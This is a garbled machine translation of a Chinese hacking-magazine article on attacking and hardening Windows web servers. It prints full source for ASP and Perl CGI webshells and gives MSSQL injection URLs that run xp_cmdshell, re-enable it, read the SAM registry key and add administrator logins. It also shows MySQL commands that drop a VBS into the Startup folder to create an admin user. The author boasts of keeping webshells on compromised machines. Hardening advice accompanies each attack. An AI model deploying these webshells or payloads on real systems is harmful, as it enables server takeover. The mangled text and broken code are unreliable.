2. Tech
  3. MSSQL injection attack server and protection

MSSQL injection attack server and protection

xiaoxiao2021-03-06  42

The article was published in the 5th issue of the hacking line, and it is a few people to write 哟

The miserable thing did not write my name, the only sentence that I want to say is Fuck black defense!

Winnt System Permissions Settings with Hackers

Foreword: On the server on various networks, as long as the hacker can successfully invade different configurations of the server, you will get certain permissions, compare Guest or System permissions, but these permissions are due to improper configuration or lack of management experience. Let hackers have successfully invaded, as long as we add certain permissions to various dangerous components and orders, it will get the greatest security. Let's introduce the sufficiency of the permissions and hackers under the NT system. Of course, the NT server cannot be a FAT32 partition. Your NT server must use the NTFS partition, because only NTFS can give your server important file settings permission, if it is FAT32 The partitioned, then there is no security, and the following introductions some intrusion prevention instances will know the importance of setting permissions.

With the rapid development of the network, now friends are installed with broadband network, and the provider business that is virtual host business is of course getting better and better. Friends who do websites are more than the years, but now the hackers are I like to put a WebShell in the space of the virtual host provider to obtain the server's management, which is the most headache of the administrator of the server. The hackers can run the cmd command in the server through a variety of WebShells, and can copy, delete files, online editing files, and build superusers. Webshell (also called webpage Troja) is a variety of things here, such as ASP, CGI, PHP, JSP's WebShell, now popular XP_cmdshell, etc., all of which are the Webshell, now we introduce it first. The hackers are called the attack and prevention methods of various WebShells of webpage Trojans. At the same time, this simplest security setting method can also prevent most of the overflow attacks on the network, such as the famous IDQ, IDA, WebDAV and RPC overflow ..., you can make hackers get the management of your server, but you pass This small security configuration, the hacker's overflow attack you will not be afraid. Even if you don't make a patch, it is safe. I believe? Do not believe? Please see below!

The attack and prevention method are actually very simple, so it is generally familiar with the web production, and the friends who know the cmd command can learn, and in my opinion, there is no big technical speech, the difficulty level (primary) is everyone It can be learned, but this tutorial can be used as a Web website server administrator whether you have many years of server management experience or novice, this tutorial can serve as a method of preventing WebShell attack and overflow attacks. .

I. Basic ASP WebShell Attack and Prevention

Here we explain the three WebShell attacks and prevention methods of the ASP (and provide WebShell source code):

For example, use the script to bind the cmd command:

This is an attack method that uses scripts to bind the cmd command. In fact, the ASP's WebShell is not allowed, and there will be two WebShell attack and prevention methods. As long as the hacker put this webhell on your server, you don't have an appropriate method of prevention, then your server will suffer from poisonous hands and become a hacker's broiler. The server that is generally killed by this poisonous hand is a server that is a virtual host provider. It is also a server that belongs to individual or company. How is hacker to pass this WebShell to your server? If it is transmitted to the web space of the virtual host provider, it is generally a virtual host provider's own ^ _ ^, because the virtual service provider's customer itself has the permission of the upload software, and HTTP service Browse the address. Customers use this WebShell purpose to see what files stored in the server space you lease or through this WebShell theft server. What do individuals or company's servers, how to pass this webhell to the server space? Oh, it is generally a script vulnerability on the server, downloading the system's script vulnerability, and obtains this WebShell to your server by using these vulnerabilities to upload files on the WWW 80 port or use the TFTP service through some vulnerabilities to transfer this WebShell to your server. Since we only explain how these WebShell attacks here, don't mention how to pass this WebShell to the server space, this article assumes that you have passed this WebShell to the server space, you and get http The browsing address, as long as the server is supported, you can use this WebShell to obtain the management power of the server system. This back door is very hidden, even if you reload N times, the patch of N is ure, Because this vulnerability is there is no patch ^ _ ^, as long as this Webshell still exists, hackers find this WebShell's WWW browsing address, your server will become hacked broilers, so it is extremely harmful. As shown in the figure below, I passed a file name called cmd.asp to the webshell file to a server IP 192.168.0.18, put this file into the WebShell folder in the FTP root directory, we will You can use http://192.168.0.18/webshell/cmd.asp to access this WebShell, we can enter all cmd commands in that blank form, such as Dir C: / etc., if you want to be on this A ultra user is created in the server, you can enter two lines commands, the first line enters the NET user Netpk Hacker / ADD and then click the execution cmd command button to create a normal user Netpk, then enter the second line command, NET localgroup administrators Netpk / Added the ordinary user Netpk, the ordinary user Netpk, joined the superuser management stage Administrators group. Through these, we can determine this WebShell has all the cmd command permissions. What do you want to do, don't teach you, huh, huh ^ _ ^.

Below with this source code for this cmd.asp script:

Execute command:

<%

DIM OSCRIPT

DIM OSCRIPTNET

Dim ofilesys, Ofile

DIM SZCMD, SZTEMPFILE

Szcmd = request.form (". cmd")

'Get CMD from the input box

ON Error ResMe next

'If an error occurs, skip directly and prevent the pop-out error window.

Set Oscript = Server.createObject ("wscript.shell") 'Establishing a shell (wshshell) object

Set ofilesys = server.createObject ("scripting.filesystemObject")

Sztempfile = "c: /" & ysys.getTempName ()

'GetTempName () is a way to establish a temporary file in FSO

Call Oscript.Run ("cmd.exe / c" & szcmd & "> & sztempfile, 0, true)

'Call the RUN of the WSHShell function to execute the command and redirect it into the temporary folder.

Set ofile = ofilesys.opentextfile (Sztempfile, 1, False, 0)

'Open temporary files in reading

%>

" Method = "POST">



<%


ON Error ResMe next


Response.write Server.htmlencode (ofile.readall)


'Output the file content after encoding


Ofile.close


'Close file


Call ofilesys.deletefile (Sztempfile, True)


'Prevent it from being seized so delete files


%>






You only need to write the above code in Notepad, save the extension as .asp, you can run it to your virtual host space. There are several script attack prevention methods for this binding cmd command. In fact, if you want to prevent this attack, you only need to delete the FSO (Scripting.FileSystemObject) function in the ASP, deleting the FSO permission method is in CMD The command prompt is entered the following command:


Regsvr32 / u c: /winnt/system32/scrrun.dll


Note: To change the actual path to your local system installation directory when actual operation, but use this method to delete too much, if we want to use FSO permissions, then you can't use it. So it is recommended not to use this method to delete FSO privileges.


However, it is obvious, if this is done, anyone including the site system administrator will not use the FileSystemObject object, which is not the result of the site management person to get, after all, we can use this object to be convenient Online station management, if the system administrator can't be used, it will not be worthless, but this dangerous object will bring security vulnerabilities to their sites. So there is no way to have a good way? Have! The specific method is as follows: We can do other people from illegally using the FileSystemObject object, but we can still use this object.


Methods as below:


Find registry


HKEY_CLASES_ROOT / SCRIPTING.FILESYSTEMOBJECT key value


Change it into the string you want (right -> "rename"), such as changes


HKEY_CLASS_ROOT / SCRIPTING.FILESYSTEMOBJECT2


In this way, this object must be referenced in ASP:


SET FSO = CreateObject ("scripting.filesystemObjectNetpk")


Can't use:


SET FSO = CreateObject ("scripting.filesystemObject")


If you use the usual way to call the FileSystemObject object, you will not be able to use it.


Oh, as long as you don't tell others, this changed object name, others cannot use the FileSystemObject object. In this way, as a site manager, we will put an illegal use of the FileSystemObject object, and we can still use this object to make it easy to implement the website online management!


But this is still a certain harmful, because the method of this configuration is not very perfect. Just simply solve the FSO calling cmd command and some simple ASP Trojan scripts. To know that WebShell is only a kind of asp, such as CGI, PHP, JSP, etc. There is such a WebShell, if your server configures support CGI , PHP, JSP, etc., that is, because of these WebShells such as CGI, you do not need to support WebShell. So you have to look down, there are some WebShells worth noting.


In fact, there is a simple and practical method to prevent this WebShell that uses the ASP script to bind the cmd command. The configuration prevention method only needs to be 30 seconds, and the method of preventing the method, etc., the WebShell, etc., because as long as one The method of preventing these script attacks and overflows, etc.


Example 2, using FSO permissions on file management WebShell attack and prevention methods


The following we introduce the Haiyang top ASP Trojan, this WebShell can change, edit, delete, move, upload, download any file on the server via web page, as long as the hacker passes this ASP Trojan, your server All files will be controlled in hackers, what hackers can do in your server? It is mentioned above. Change, delete, move ...


As shown below:


See this picture, you can also imagine your server to the end how it will be, your server will have no privacy, want to black your server or delete files on your server. It is possible to do a few mice. There are downloads on each hacker website on this ASP Trojan network, and the source code is inconvenient to write.


Prevention method: As an example, here is no longer rear.


Remnant: Is that it is the WebShell for ASP to close the FSO or give the FSO to change the name in the registration form? This is not the case, because there is another kind of ASP Trojan that does not require FSO to support, although it is not very powerful, but it is necessary to black a website, the function is already very enough, this kind of Trojan Defense. Please see Example III below. Example 3: ASP Trojan, which can be used for FSO


ASP Troja, which can be used in this free FSO, due to less FSO's support, is of course not very powerful, only the file directory, copy, mobile file on the server, execute the specified path Program files and more. It is worth noting that most of the virtual host providers still have this vulnerability, it seems that this vulnerability network tester is not well maintained. The following is the legend that appears when you browse this ASP Trojan. There is also the same vulnerability even if the server of the hacking base is also. With the results of my test, you can easily obtain the management right of the hacking base, but people say that I am a black base, so I don't do this. (Edit Comrade, I wrote the black foundation you can delete, because the black-based server is not safe, and the grass people have come in to help them visit. Just I have no mood to inform those brags B, my own server It is not good to maintain, but also talked people's safety maintenance of the servers. As for now black foundation, there is no such loopholes, because there is no mood to help them test.)


You can make any replication and mobile and executing programs on the server's files on the server through this free FSO, which is just simple, but it is already enough to use it to black a website. For example, we can move the homepage of the website to other places, then we will replicate a hacker page that is the same name. Use the execution program to allow the server to perform any Trojan program to obtain the server's admin management.


Here I gave this ASP source code for this free FSO object, the code is as follows:


<% response.write " can only be executed at a time:) "%>


<% response.write now ()%> 
 The physical path where the program is located:


<% response.write request.servervariables ("Appl_Physical_Path")%>




 asp's shell.Application backdoor </ title></p>
<p><body></p>
<p><form action = "<% = Request.ServerVariables (" URL ")%>" Method = "POST"></p>
<p><Input Type = Text Name = Text Value = "<% = SZCMD%>"> Enter the directory you want to browse <br></p>
<p><input type = text name = text1 value = "<% = szcmd1%>">></p>
<p>Copy</p>
<p><input type = text name = text2 value = "<% = szcmd2%>> <br></p>
<p><input type = text name = text3 value = "<% = szcmd3%>"> MOVE</p>
<p><input type = text name = text4 value = "<% = szcmd4%>"> <br></p>
<p>Path: <input type = text name = text5 value = "<% = szcmd5%>">></p>
<p>Program: <input type = text name = text6 value = "<% = szcmd6%>> <br></p>
<p><Input Type = Submit Name = SB Value = Send Command></p>
<p></ form></p>
<p></ body></p>
<p></ html></p>
<p><%</p>
<p>Szcmd = request.form ("text") 'directory browsing</p>
<p>IF (Szcmd <> ").</p>
<p>Set shell = server.createObject ("shell.application") 'Create a shell object</p>
<p>SET FOD1 = shell.namespace (SZCMD)</p>
<p>SET FODITEMS = FOD1.ITEMS</p>
<p>For Each Co in FodItems</p>
<p>Response.write "<font color = red>" & co.path & "-----" & co.size & "</ font> <br>"</p>
<p>NEXT</p>
<p>END IF</p>
<p>%></p>
<p><%</p>
<p>Szcmd1 = request.form ("text1") 'directory copy, can not be filed</p>
<p>SZCMD2 = Request.form ("text2")</p>
<p>IF SZCMD1 <> "" and szcmd2 <> "" ""</p>
<p>Set shell1 = server.createObject ("shell.application") 'Establishing a shell object</p>
<p>SET FOD1 = shell1.namespace (SZCMD2)</p>
<p>For i = len (szcmd1) to 1 step -1</p>
<p>IF MID (SZCMD1, I, 1) = "/" THEN</p>
<p>PATH = Left (Szcmd1, I-1)</p>
<p>EXIT for</p>
<p>END IF</p>
<p>NEXT</p>
<p>IF LEN (PATH) = 2 THEN PATH = PATH & "/"</p>
<p>PATH2 = Right (SZCMD1, LEN (SZCMD1) -i)</p>
<p>SET FOD2 = shell1.namespace (PATH)</p>
<p>SET FODITEM = FOD2.PARSENAME (PATH2)</p>
<p>FOD1.COPYHERE FODITEM</p>
<p>Response.write "Command Complated Success!"</p>
<p>END IF</p>
<p>%></p>
<p><%</p>
<p>SZCMD3 = Request.form ("text3") 'directory mobile</p>
<p>SZCMD4 = Request.form ("text4")</p>
<p>If SZCMD3 <> "" and szcmd4 <> "" "THENSET shell2 = server.createObject (" shell.application ") 'Creating a shell object</p>
<p>SET FOD1 = shell2.namespace (SZCMD4)</p>
<p>For i = len (szcmd3) to 1 step -1</p>
<p>IF MID (SZCMD3, I, 1) = "/" THEN</p>
<p>PATH = Left (SZCMD3, I-1)</p>
<p>EXIT for</p>
<p>END IF</p>
<p>NEXT</p>
<p>IF LEN (PATH) = 2 THEN PATH = PATH & "/"</p>
<p>PATH2 = Right (SZCMD3, LEN (SZCMD3) -i)</p>
<p>SET FOD2 = shell2.namespace (PATH)</p>
<p>SET FODITEM = FOD2.PARSENAME (PATH2)</p>
<p>FOD1.MOVEHERE FODITEM</p>
<p>Response.write "Command Complated Success!"</p>
<p>END IF</p>
<p>%></p>
<p><%</p>
<p>SZCMD5 = Request.form ("Text5") 'Execute the program to specify the path</p>
<p>SZCMD6 = Request.form ("text6")</p>
<p>IF SZCMD5 <> "" and szcmd6 <> "" "" "</p>
<p>Set shell3 = server.createObject ("shell.application") 'Create a shell object</p>
<p>Shell3.namespace (szcmd5) .Items.Item (szcmd6) .invokeverb</p>
<p>Response.write "Command Complated Success!"</p>
<p>END IF</p>
<p>%></p>
<p>You only need to write the above code in Notepad, save the extension as .asp, you can run it to your virtual host space.</p>
<p>ASP Trojan approach to prevent FSO support is as follows:</p>
<p>Through the above code, we can see that the shell of this code is created by Shell.Application, we only need to find the key value shell.Application and WScript.Shell key values ​​in the registry, then remove these key values. To prevent this type of ASP Trojan attack, delete these key values ​​will not affect your server and ASP support, so please delete it.</p>
<p>Second, build from the FSO threat virtual host</p>
<p>Most of the virtual hosts are now disabled: FileSystemObject, because this component provides powerful file system access capabilities for ASP, read, write, copy, delete, rename, etc. Operation (of course, this means to do it under Windows NT / 2000 using the default setting). But after prohibiting this component, the consequences caused by all ASPs that use this component will not be able to run, and cannot meet the needs of customers.</p>
<p>How to allow both FileSystemObject components, do not affect the security of the server (ie: Different virtual host users can not use the component to read and write the files)? Here is a method that I have obtained in the experiment, which is described below with Windows 2000 Server as an example.</p>
<p>Open the resource manager on the server, right-click the drive letter of each hard disk partition or volume, select "Properties" in the pop-up menu, select the Security tab, you can see which accounts can be accessed to access this partition Volumes and access rights. After the default installation, "Everyone" has full control. Add "Administrators", "Backup Operators", "Power Users", "Users", etc., and give "full control" or corresponding permissions, pay attention, do not give "Guests" group, "IUSR_ machine name" these accounts any permissions. Then, "Everyone" group is then deleted from the list, so that only authorized groups and users can access this hard disk partition, and when the ASP is executed, it is access to the hard disk as "IUSR_ machine name", this is not given here User account permissions, ASP can also read and write files on the hard disk. The following is to set a separate user account to each virtual host user, and then assign each account to a directory that allows its fully controlled.</p>
<p>As shown in the figure below, open "Computer Management" → "Local User and Group" → "User", click the right mouse button in the right column, select "New User" in the pop-up menu:</p>
<p>In the "New User" dialog box in the pop-up, "User Name", "Full Name", "Description", "Password", "Confirm Password" are entered according to actual needs, and the "user must change the password next time" The right pair is removed, and "the user cannot change the password" and "password never expire". This example is a built-in account "IUSR_VHOST1" that establishes an anonymous access Internet information service for the user of the first virtual host, ie: all clients use http: //xxx.xxx.xxxx/ to access this virtual host, Identity to access. Enter the completion of the "creation". You can create multiple users according to actual needs, and after the creation is complete, "Close":</p>
<p>Now the newly established user has appeared in the account list, double-click the account in the list to further set:</p>
<p>In the pop-up "IUSR_VHOST1" (ie, the new account that is just created) Properties dialog box is "belonging to" tab:</p>
<p>The original account is default that belongs to the "User" group, selecting the group, point "delete":</p>
<p>Now, as shown in the figure below, then "Add" again:</p>
<p>Find "Guests" in the "Select Group" dialog box that pops up, click "Add", this group will appear in the text box below, then click "OK":</p>
<p>The appearance is the content shown below, click "OK" to close this dialog box:</p>
<p>Open the Internet Information Services, start setting the virtual host, in this case to explain the "first virtual host" setting as an example, right-click the host name, select "Properties" in the pop-up menu:</p>
<p>A "first virtual host properties" dialog box is popped, and you can see the use of the virtual host user from the dialog box: F: / vhost1 "folder:</p>
<p>Temporarily, no matter what the "First Virtual Host Properties" dialog, switch to "F: / Vhost1" folder, right click, select the "Properties" → "Security" tab, at this time It can be seen that the default security setting of the folder is "Everyone" full control (depending on the content displayed by different situations), first "allowing the inheritance of the inheritance from the parent to the object" to the object ". Remove the right:</p>
<p>At this point, "Security" warning as shown below is popped, click "Delete":</p>
<p>All groups and users in the Security tab will be empty (if not clear, use "Delete" to empty it), then click the "Add" button. Add "administrator" as shown in the figure, add the new account "IUSR_VHOST1" created in the previous, will give full control permissions, but also add other groups or users according to actual needs, but must not put "guests" group , "IUSR_ machine name" these anonymous access to the account added!</p>
<p>Switch to the previously opened "First Virtual Host Properties" dialog, open the "Directory Security" tab, "edit": "Edit":</p>
<p>In the "Verification Method" other box (shown below), click "Edit":</p>
<p>The "Anonymous User Account" popped up, the default is "IUSR_Merical Name", click "Browse":</p>
<p>Find the new account "IUSR_VHOST1" created in the "Select User" dialog box, double click:</p>
<p>At this point, the anonymous username is changed, and when entering the previous creation in the password box, the password set for the account:</p>
<p>Determine the password again:</p>
<p>OK, complete, click OK to close these dialogs.</p>
<p>After this setting, the "first virtual host" user uses the ASP's FileSystemObject component to access its own directory: F: / vhost1, when trying to access other content, there will be, such as "no permissions", "The hard disk is not ready", "500 server internal error" and other errors prompts.</p>
<p>Another: If the user needs to read the partition capacity of the hard disk and the serial number of the hard disk, the setting will not be read. If you want to read these and the entire partition related content, right click on the partition (volume) of the hard disk, select "Properties" → "Security", add this user's account to the list, and give at least "read "Permissions. Since the subdirectory under this volume has been set to "Prohibit the transfer of the inheritance rights from the parent to this object", the permission settings of the subdirectory below are not affected.</p>
<p>Third, Based on CGI, PHP, JSP Webshell and Overflow Attack and Prevention</p>
<p>CGI, PHP, JSP scripts can also bind the cmd command, but the basic CGI's WebShell function permissions are not the same? The answer is that their Webshell permissions are the same, and the way to use scripts, but the method of preventing the use of scripts is completely different. Support, so even if you turn the FSO object, remove the shell.Application and WScript.Shell key values ​​in the ASP's WebShell in the registry, and cannot prevent these scripts WebShell.</p>
<p>Since ASP, CGI, PHP, JSP Bind the CMD command through the script is small, it can fully prevent such attacks in this type of attack, in this case, I will put one A security configuration can be completed within 30 seconds, so that any script does not call your CMD command remotely to achieve the purpose of complete preventive script binding CMD. WebShell's attack method we are here for a last example.</p>
<p>Below, the example: CGI WebShell Attack and Prevention</p>
<p>As shown in the figure below, as long as the hacker passes a cmd.cgi's WebShell to your server, the hacker can call the cmd command in your server and run all the cmd commands in your server, such as establishing a super user, etc. The following figure is the WebShell running DIR C: / command using this cmd.cgi. If the hacker has passed this stuff on your server, huh, you want to cry without tears.</p>
<p>Even if you reload the N-times server system, play N more patch, useless, as long as you don't delete this Webshell, hacker knows this Webshell's www browsing address, you can always use your machine as broiler. I used to invade the broiler left this stuff in the other's virtual host directory. I called him not to die. As long as the other party does not delete this Webshell, then his server is always my broiler, because this east East anti-virus software can't be found. The code for this cmd.cgi is given below (there are many hackers on the network to provide downloads):</p>
<p>USE CGI QW (: standard);</p>
<p>Print header (-Charset => GB2312);</p>
<p>$ cmd = param ("cmd");</p>
<p>$ OUT = `$ cmd 2> & 1`;</p>
<p>Print Start_Form, TextField ("CMD", $ CMD, 60);</p>
<p>PRINT END_FORM;</p>
<p>Print pre ($ OUT);</p>
<p>The above is this WebShell code, and some of the WebShells such as PHP and JSP. It will not be introduced here, because the attack and prevention methods are similar, through these examples, we see these WebShells are called NT. The cmd.exe command under the system is executed, as long as we set a certain permissions to the cmd.exe file under the NT system, huh, then the hacker's WebShell will have no use. For safety, we have to make permission settings for dangerous commands such as Net.EXE CaCls.exe Telnet.exe TFTP.EXE TFTP.EXE FORMAT.com Mountvol.exe Mshta.exe. Because these dangerous documents are user access and execution of users to be allowed by the guests, only the permissions are set for these files, so that true security can be ensured. These dangerous files are stored in the directory of C: / Winnt / System32 in the case of default. To set permissions, as shown below, clear all other users to access these commands, and then set only the permissions that allow you to use these commands, such as the super user name you are using is administrator. You only allow users named Administrator to use these commands in the permission settings.</p>
<p>Through these simple settings, you can make those WebShell that binds the cmd command in your server, simple enough. :) And also prevent your server from being binding the cmd command to log in to your server after being sucked by the hacker, the reason is simple, such as the current WEBDAV overflow, these overflow attacks are hackers after overflow your server Bind your CMD command in your server, then Telnet login to your server, get system management rights on your server, but after the hacker overflows, it is only necessary to use System permission to bind your server's cmd command, And you have set the cmd command to disable SYSTEM access, you can only use the unique one you set to access the CMD command. Therefore, even if the hacker successfully overflows, you can't bind your CMD command. If hackers can't land your server, your server is safe.</p>
<p>But this can only be relatively safe, because some overflow attack hackers can pass the reverse connected Trojan file to your server and can run. Oh, if the recent SERV-U overflow, if your FTP server uses Serv-U, you have not hit the latest security patches, let hackers have been overflow, then hackers can not bind your cmd command to log in. You Server, but gives your server to pass a reverse connected Trojan back door, which is connected to the hacker's machine through your server, and hackers can listen in their own machine, as long as your server This back door, then even if your server is installed, the firewall is installed, and the hacker cannot connect to the back door of the Trojan with your server, but the hacker gives you a reverse connected Trojan, this Trojan is passed Your server connects the hacker's machine, as long as your server issues a connection request to hackers, hackers can get the control of your server, and this reverse Trojan attack can completely do not rely on CMD under the NT system. It can be reversely connected to the harm of Trojans. So if we prevent this inverse Trojan attack? The method is simple, that is, installing a firewall with preventing reverse connecting Trojans, such as Tianwang and Blackice firewall. They are all prevented from reverse connection, because these firewalls have an application to access the network rights setting function. Any program on the server is to access the network, which will pop up a warning window. You must have the server to agree to allow the application to access the network, which is just used to prevent reverse Trojans. Let's take an example, such as your server installed the Tianwang firewall, such as hackers successfully overflow your serv-u server, and send you a reverse connection back door Trojan, this back door Trojan in your server C: /Mm.exe, the IP address in which the hacker is located is 192.168.0.18. Now the hacker is connected to the reverse of your server. As long as the hacker runs this reverse Trojan on your server, then your Tianwang firewall will Pop up a warning window, as shown below:</p>
<p>We can see the truly IP address of the hacker and hacker using this reverse Trojan, the protocol used in this warning window, and this reverse connection Trojan is in your server's location, as long as you click the forbidden button This program will not connect the hacker's machine, I believe you will not be so stupid, click to allow this back door to connect the hacker machine, where you didn't click Allowed, this back door would not connect the hacker's machine. :)</p>
<p>Through this example, we can see that as long as we give some dangerous orders such as CMD, we can set a firewall that prevents reverse connecting Trojans, then those so-called overflow attacks will not cause your server. .</p>
<p>Fourth, MSSQL injection protection (this article is written by this site member alpha)</p>
<p>The MSSQL injection attack is an attack method that is relatively straightforward and harmful, and those so-called hackers can use it directly to obtain system privileges. Today we will take a look at how to prevent this attack through system settings:</p>
<p>The first thing to declare is that this setting can guarantee your server security, safety is a whole, but the whole is constructed from these parts!</p>
<p>Countermeasure 1:</p>
<p>Pseudo hacker:</p>
<p>Suppose this place can be injected</p>
<p>http://localhost/bbs/news.asp? id = 5</p>
<p>We often take the following ways to attack</p>
<p>http://localhost/bbs/news.asp? id = 5; exec master.dbo.xp_cmdshell 'net user alpha / add' ---</p>
<p>http://localhost/bbs/news.asp? id = 5; exec master.dbo.xp_cmdshell 'net loclagroup administrators alpha / add' - well, alpha is already a system administrator!</p>
<p>Manager:</p>
<p>How to prevent?</p>
<p>See how they implement, by calling the XP_cmdshell in the extended stored procedure in SQL, (as shown below)!</p>
<p>We only need to right-click to delete this extension store, the above attack method does not work!</p>
<p>Of course, you can also use the following:</p>
<p>sp_dropextendedProc 'XP_cmdshell'</p>
<p>To delete XP_cmdshell</p>
<p>Countermeasure 2:</p>
<p>Hacker countermeasures, if the XP_cmdshell extension in the MSSQL database is deleted, don't be afraid, we have a way!</p>
<p>http://localhost/bbs/news.asp? id = 5; exec master.dbo.sp_addextendedProc xp_cmdshell @ dllname = 'xplog70.dll'; -</p>
<p>Through such a one, we will return XP_CMDSHELL.</p>
<p>Manager: Rely, it seems that our setting is not complete enough</p>
<p>Ok, search for xplog70.dll directly in the C drive</p>
<p>Figure</p>
<p>I found it, deleted it, ok, this world is quiet, at least the help will not directly implement system instructions! !</p>
<p>Countermeasure 3:</p>
<p>Pseudo-hacker: Can you think this is it? You are wrong, huh, huh, I still have a lot!</p>
<p>As long as you use a SA account, I still have a way.</p>
<p>http://localhost/bbs/news.asp? id = 5; EXEC XP_REGREAD 'HKEY_LOCAL_MACHINE', 'SECURITY / SAM / DOMAINS / Account', 'F'</p>
<p>Look, maybe we can get the administrator's password!</p>
<p>Add a startup item to nature is not there.</p>
<p>Manager:</p>
<p>It seems that I have to go down, see me, I deleted these extensions.</p>
<p>XP_REGADDMULTINTRING (adding items to the registry)</p>
<p>XP_regDeleteKey (remove a key from the registry)</p>
<p>XP_REGDELETEVALUE (delete a key value from the registry)</p>
<p>XP_REGENUMVALUES (list key values ​​under primary keys)</p>
<p>XP_REGREAD (read the key value under a primary key)</p>
<p>XP_REGREMOVEMULTINTRING (Remove Project from the Registry)</p>
<p>XP_REGWRITE (written to the registry)</p>
<p>See you arrogant, huh, huh, want to do it from the registry, no door!</p>
<p>Countermeasure 4:</p>
<p>Pseudo hacker:</p>
<p>Don't let the registry, even if I can figure out anything else! Can I add a SQL administrator?</p>
<p>Really!</p>
<p>Http://localhost/bbs/news.asp? id = 5; exec master.dbo.sp_addlogin alpha;</p>
<p>Http://localhost/bbs/news.asp? id = 5; exec master.dbo.sp_password null, alpha, alpha;</p>
<p>http://localhost/bbs/news.asp? id = 5; exec master.dbo.sp_addsrvrolemember sysadmin alpha;-see, say that XP_cmdshell can be used on that day, I am administrator!</p>
<p>Manager:</p>
<p>Forget it, I don't have to be with you, I don't have to connect the database without SA?</p>
<p>I built a lower account, such as building a database called BBS.</p>
<p>Then build a account called BBS</p>
<p>Determine the then we will set it back under the user of BBS:</p>
<p>Give him some basic permissions,</p>
<p>Ok, if you use this user to connect the BBS database, it is much more secure relative to SA!</p>
<p>There are many more many others.</p>
<p>such as:</p>
<p>Delete excess system stored procedures</p>
<p>sp_bindsession sp_cursor sp_cursorclos sp_cursorfetch sp_cursoropen sp_cursoroption sp_getbindtoken sp_GetMBCSCharLen sp_IsMBCSLeadByte sp_OACreate sp_OADestroy sp_OAGetErrorInfo sp_OAGetProperty sp_OAMethod sp_OASetProperty sp_OAStop sp_replcmds sp_replcounters sp_repldone sp_replflush sp_replstatus sp_repltrans sp_sdidebug xp_availablemedia xp_cmdshell xp_deletemail xp_dirtree xp_dropwebtask xp_dsninfo xp_enumdsn xp_enumerrorlogs xp_enumgroups xp_enumqueuedtasks xp_eventlog xp_findnextmsg xp_fixeddrives xp_getfiledetails xp_getnetname xp_grantlogin xp_logevent xp_loginconfig xp_logininfo xp_makewebtask xp_msver xp_perfend xp_perfmonitor xp_perfsample xp_perfstart xp_readerrorlog xp_readmail xp_revokelogin xp_runwebtask xp_schedulersignal xp_sendmail xp_servicecontrol xp_snmp_getstate xp_snmp_raisetrap xp_sprintf xp_sqlinventory xp_sqlregister xp_sqltrace xp_sscanf xp_startmail xp_stopmail xp_subdirs xp_unc_to_drive</p>
<p>Regularly check user login</p>
<p>Use master</p>
<p>Select Name, Password, Accdate</p>
<p>From syslogins</p>
<p>ORDER BY NAME</p>
<p>Today, I said here!</p>
<p>In fact, MSSQL's injection attack defense has a lot of things!</p>
<p>For example, export special documents, crack the website password, too much too much, today is simple to introduce these</p>
<p>Even I want to say, even if you are set up, your system is still dangerous, or fragile!</p>
<p>To get a safer configuration, continue to pay attention to the server focus! ! !</p>
<p>V. Simple mysql database intrusion prevention problem (this article is written by server focus member Lonely, it is a bit bad)</p>
<p>On the network, many systems (Win2K, Linux) have a MySQL database. Indeed, this database is very popular, but such a popular database has a vulnerability - it is a database's root's account password is empty, and now many machines have such problems. I have scanned a Class C address, and I found that the database root password is more than 89 machines, because MySQL can call the XP-shell command as the MSSQL database, so many people find such a vulnerability will not be utilized. Let me introduce it, how to use the root password of Win2K as an empty database:</p>
<p>If you install MySQL on your machine, you can use the following command: #mysql -u root -h 192.168.0.1 After the connection is successful, see what the server is available: mysql> show Databases MySQL is mysql, TEST these two database. Mysql> Use test After entering TEST, see what data is there: mysql> Shows Tables, then I haven't built a new table inside: mysql> create table lonely (abc text) Here I created a table name For the LONELY, the field is the form of ABC.</p>
<p>We write a command to increase the user who adds admin, password 123. as follows:</p>
<p>MySQL> Insert Into Avalues ​​("SETWSHELL = CREATEOBJECT (" "W s cript.shell") ")</p>
<p>MySQL> INSERT INTO AVALUES ("A = WSHSHELL.Run (" CMD.exe / C Net Admin 123 / Add "", 0) ");</p>
<p>MySQL> INSERT INTO AVALUES ("B = WSGsgell.Run (" cmd.exe / c net localgroup administrators admin / add "", 0); see if there is any wrong place: mysql> Select * Forma output table is one VCS script file: mysql> select * from ainto autfile "C: // Docume ~ 1 // alluse ~ 1 // [Start] Menu // Program //CESHI.VBS"</p>
<p>We enter the content in the table to the start group, is a VBS script file! Note "/" symbol. Now all the work is complete, the machine will restart, the machine will restart, CESHI.VBS will also start, when there is a user in the machine, the password is: 123 superuser.</p>
<p>Defense method:</p>
<p>For the easiest and secure method of this attack method is to increase passwords for MySQL root users. Methods as below:</p>
<p>Local setting password: MySQL Uroot Password Password</p>
<p>Remote setting Password: grant select, update, delete on * .. * to root @ "Identified by" password "as follows:</p>
<p>MySQL> Grant SELECT, UPDATE, DELETE ON *.. * TO ROOT @ "Identified by" 123 "> / c</p>
<p>MySQL> Grant Select, update, delete on * ..1 * to root @ "Identified by" 123 "query OK, 0ROUS Affected <0 34 See> Editor: I hope to give some help through this article, write still There are many shortcomings, because of the reason, there is not much time to write the entire security configuration process more details, if you need to learn more server attack, defense knowledge, please visit the server focus website http://www.serverfocus .NET or http://www.cnhack.cn. If you have any questions and recommendations, e-mail to Netpk@cnhack.cn are issued.</p></div><div class="text-center mt-3 text-grey">
转载请注明原文地址:https://www.9cbs.com/read-54823.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>)
</div><div></div></div></div><ul class="postlist list-unstyled">


</ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="54823" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved
                

</div><div class="col text-right">Processed:
<b>0.044</b>, SQL:
                <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script>
var debug = DEBUG = 0;
var url_rewrite_on = 1;
var url_path = './';
var forumarr = {"1":"Tech"};
var fid = 1;
